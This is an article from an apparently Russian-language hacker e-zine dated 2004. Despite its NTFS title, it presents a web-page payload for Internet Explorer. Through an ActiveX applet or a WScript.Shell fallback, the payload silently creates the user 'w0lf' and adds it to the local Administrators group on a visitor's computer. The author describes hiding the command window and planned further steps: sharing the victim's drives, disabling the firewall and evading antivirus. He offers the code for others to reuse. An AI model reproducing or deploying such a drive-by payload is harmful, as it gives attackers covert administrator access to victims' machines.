What about NTFS?

Народная мудрость: чем больше диск, тем больше риск

+--------------------------------------------------------------------------------------------------------------------------------[release: 03.08.04]----+

|
|
|
|
|
|
|

  _|_|    _|_|_|    _|_|    _|_|_|    _|_|    _|  _|    _|  _|_|    _|_|_|      _|  _|    _|  _|
_|      _|  _|  _|  _|  _|  _|        _|  _|      _|_|_|_|  _|  _|  _|        _|_|_|_|_|  _|  _|
_|      _|_|_|_|_|  _|  _|  _|_|      _|_|    _|  _| |  _|  _|_|    _|_|_|      _|  _|      _|_|
_|      _|  _|  _|  _|  _|  _|        _|      _|  _|    _|  _|          _|    _|_|_|_|_|      _|
  _|_|    _|_|_|    _|_|    _|_|_|    _|      _|  _|    _|  _|      _|_|_|      _|  _|        _|

|
|
|
|
|
|
|

+-------------------------------------------------------------------------------------------------------------------------------------------------------------+

+--------------------------------------------------------------[0x07: What about NTFS?]------------------------------------------------------------+

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|

Почитал я как-то хаос е-зайн, статью про потоки в нтфс (файловая система в винде линейки нт +)). И подумал можно ли написать скрипт который:
1. Создавал на компе пользователя.
2. Двигал нового пользователя в группу админов.
3. Открывал на доступ локальные диски (расшаривал диски =))

Предполагалось еще тушить файерволл (если он есть соответственно), думал над тем как обойти запущенный на компе жертвы антивирус.. а потом меня взяла лень.. и я просто забил на все это.. То что успел написать выкладываю здесь.. может кому-нить и пригодицца..

Итак, вот код:

<applet id="theActiveX" 
code=com.ms.activeX.ActiveXComponent
height=0 width=0>
</applet>
<script>
function modify() 
{try{theActiveX.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
  theActiveX.createInstance();
  Shl=theActiveX.GetObject();
    }
  catch(gfgf)
   {
    try
   {
 Shl=new ActiveXObject("WScript.Shell"); 
   }
catch(fdsafd){};
   }}       

function work()
{try{Shl.run("net user w0lf password /add",0);
Shl.run("net localgroup Администраторы w0lf /add",0);
}catch(dsds){}} 

setTimeout("modify()",100);
setTimeout("work()",100);
</script>

значит, чо мы тут делаем.. объявляем активх компонент Shl, предполагалось заюзать уязвимость во все том же активх.. дома, у мя все пахало на ура (windows 2000 pro без сервис паков, ослик 6). Но на работе windows 2000 server (со всеми заплатами), ослик 5.5 - отказалось работать (выдает запрос на запуск объекта.. что само по себе не прикольно).

Shl.run("net user w0lf password /add",0); создаем пользователя w0lf
0 для того чтобы не выводилось окно cmd во время наших манипуляций ;))
Shl.run("net localgroup Администраторы w0lf /add",0); двигаем созданного пользователя в группу админов..

По поводу других возможностей ничего говорить не буду.. а тому кому все-таки интересно то.. Пуск->Выполнить->cmd в появившейся консоли: net /? и читаем.. Скажу лишь что можно еще писать в реестр, запускать и останавливать сервисы.. да и много чего еще.. Только вот код мне лень отлаживать.. потому и выложил то что есть..

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|

+-----[content]-----------------------------------------------------------------------------------------------------------------------------[mail us]-----+